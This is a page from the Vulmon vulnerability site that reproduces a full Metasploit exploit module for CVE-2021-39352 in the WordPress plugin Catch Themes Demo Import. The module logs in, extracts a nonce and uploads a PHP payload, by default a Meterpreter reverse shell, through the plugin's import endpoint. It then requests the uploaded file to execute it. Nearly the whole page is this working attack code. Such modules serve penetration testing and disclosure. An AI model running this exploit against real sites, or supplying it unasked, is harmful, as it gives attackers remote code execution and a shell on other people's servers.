Vulmon Recent Vulnerabilities Research Posts Trends Blog About Contact

WordPress Catch Themes Demo Import Shell Upload

Related Vulnerabilities: CVE-2021-39352  
Publish Date: 05 Jan 2022
Author: h00die, Thinkland Security Team, Ron Jost, metasploit.com
Source 
                							

                ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Wordpress Plugin Catch Themes Demo Import RCE',
        'Description' => %q{
          The Wordpress Plugin Catch Themes Demo Import versions < 1.8 are vulnerable to authenticated
          arbitrary file uploads via the import functionality found in the
          ~/inc/CatchThemesDemoImport.php file, due to insufficient file type validation.
          Re-exploitation may need a reboot of the server, or to wait an arbitrary timeout.
          During testing this timeout was roughly 5min.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die', # msf module
          'Ron Jost', # edb
          'Thinkland Security Team' # listed on wordfence's site
        ],
        'References' => [
          [ 'EDB', '50580' ],
          [ 'CVE', '2021-39352' ],
          [ 'URL', 'https://plugins.trac.wordpress.org/changeset/2617555/catch-themes-demo-import/trunk/inc/CatchThemesDemoImport.php' ],
          [ 'URL', 'https://www.wordfence.com/vulnerability-advisories/#CVE-2021-39352' ],
          [ 'WPVDB', '781f2ff4-cb94-40d7-96cb-90128daed862' ]
        ],
        'Platform' => ['php'],
        'Privileged' => false,
        'Arch' => ARCH_PHP,
        'Targets' => [
          [ 'Automatic Target', {}]
        ],
        # we leave this out as typically php.ini will bail before 350mb, and payloads are small enough to fit as is.
        # 'Payload'        =>
        # {
        #   # https://plugins.trac.wordpress.org/browser/catch-themes-demo-import/tags/1.6.1/inc/CatchThemesDemoImport.php#L226
        #   'Space' => 367_001_600, # 350mb
        # }
        'DisclosureDate' => '2021-10-21',
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'php/meterpreter/reverse_tcp'
        },
        'Notes' => {
          'Stability' => [ CRASH_SAFE ],
          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
          # https://support.shufflehound.com/forums/topic/i-cant-use-the-one-click-demo-installer/#post-31770
          # re-exploitation may need a reboot of the server, or to wait an arbitrary timeout.
          'Reliability' => [ UNRELIABLE_SESSION ]
        }
      )
    )

    register_options [
      OptString.new('USERNAME', [true, 'Username of the account', 'admin']),
      OptString.new('PASSWORD', [true, 'Password of the account', 'admin']),
      OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']),
    ]
  end

  def check
    return CheckCode::Safe('Wordpress not detected.') unless wordpress_and_online?

    checkcode = check_plugin_version_from_readme('catch-themes-demo-import', '1.8')
    if checkcode == CheckCode::Safe
      print_error('catch-themes-demo-import not a vulnerable version')
    end
    checkcode
  end

  def exploit
    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])

    if cookie.nil?
      vprint_error('Invalid login, check credentials')
      return
    end

    # grab the ajax_nonce
    res = send_request_cgi({
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'themes.php'),
      'method' => 'GET',
      'cookie' => cookie,
      'keep_cookies' => 'false', # for some reason wordpress gives back an unauth cookie here, so ignore it.
      'vars_get' => {
        'page' => 'catch-themes-demo-import'
      }
    })
    fail_with(Failure::Unreachable, 'Site not responding') unless res
    fail_with(Failure::UnexpectedReply, 'Failed to retrieve page') unless res.code == 200
    /"ajax_nonce":"(?<ajax_nonce>[a-z0-9]{10})"/ =~ res.body
    fail_with(Failure::UnexpectedReply, 'Unable to find ajax_nonce on page') unless ajax_nonce
    vprint_status("Ajax Nonce: #{ajax_nonce}")

    random_filename = "#{rand_text_alphanumeric(6..12)}.php"
    vprint_status("Uploading payload filename: #{random_filename}")

    multipart_form = Rex::MIME::Message.new
    multipart_form.add_part('ctdi_import_demo_data', nil, nil, 'form-data; name="action"')
    multipart_form.add_part(ajax_nonce, nil, nil, 'form-data; name="security"')
    multipart_form.add_part('undefined', nil, nil, 'form-data; name="selected"')
    multipart_form.add_part(
      payload.encoded,
      'application/x-php',
      nil,
      "form-data; name=\"content_file\"; filename=\"#{random_filename}\""
    )

    res = send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'wp-admin', 'admin-ajax.php'),
      'method' => 'POST',
      'cookie' => cookie,
      'keep_cookies' => 'true',
      'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
      'data' => multipart_form.to_s
    )
    fail_with(Failure::Unreachable, 'Site not responding') unless res
    fail_with(Failure::UnexpectedReply, 'Plugin not ready to process new payloads. Please retry in a few minutes.') if res.code == 200 && res.body.include?('afterAllImportAJAX')
    fail_with(Failure::UnexpectedReply, 'Failed to upload payload') unless res.code == 500
    # yes, a 500. We uploaded a malformed item, so when it tries to import it, it fails.  This
    # is actually positive as it won't display a malformed item anywhere in the UI.  Simply writes our payload, then exits (non-gracefully)
    #
    # [Fri Dec 24 16:48:00.904980 2021] [php7:error] [pid 440128] [client 192.168.2.199:38107] PHP Fatal error:  Uncaught Error: Class 'XMLReader' not found in /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/vendor/catchthemes/wp-content-importer-v2/src/WXRImporter.php:123
    # Stack trace:
    # #0 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/vendor/catchthemes/wp-content-importer-v2/src/WXRImporter.php(331): CatchThemes\\WPContentImporter2\\WXRImporter->get_reader()
    # #1 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/inc/Importer.php(80): CatchThemes\\WPContentImporter2\\WXRImporter->import()
    # #2 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/inc/Importer.php(137): CTDI\\Importer->import()
    # #3 /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/inc/CatchThemesDemoImport.php(306): CTDI\\Importer->import_content()
    # #4 /var/www/wordpress/wp-includes/class-wp-hook.php(292): CTDI\\CatchThemesDemoImport->import_demo_data_ajax_callback()
    # #5 /var/www/wordpress/wp-includes/class-wp-hook.php(316): WP_Hook->apply_filters()
    # #6 /var/www/wordpress/wp-includes/plugin.php(484): WP_ in /var/www/wordpress/wp-content/plugins/catch-themes-demo-import/vendor/catchthemes/wp-content-importer-v2/src/WXRImporter.php on line 123
    register_file_for_cleanup(random_filename)
    month = Date.today.month.to_s.rjust(2, '0')
    print_status("Triggering payload at wp-content/uploads/#{Date.today.year}/#{month}/#{random_filename}")
    send_request_cgi(
      'uri' => normalize_uri(target_uri.path, 'wp-content', 'uploads', Date.today.year, month, random_filename),
      'method' => 'GET',
      'keep_cookies' => 'true'
    )
  end
end
<p>

Vulmon Search

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

About

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Products

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Connect

Twitter Reddit Linkedin Facebook

Vulnerability Notification Service
You don’t have to wait for vulnerability scanning results
Get Started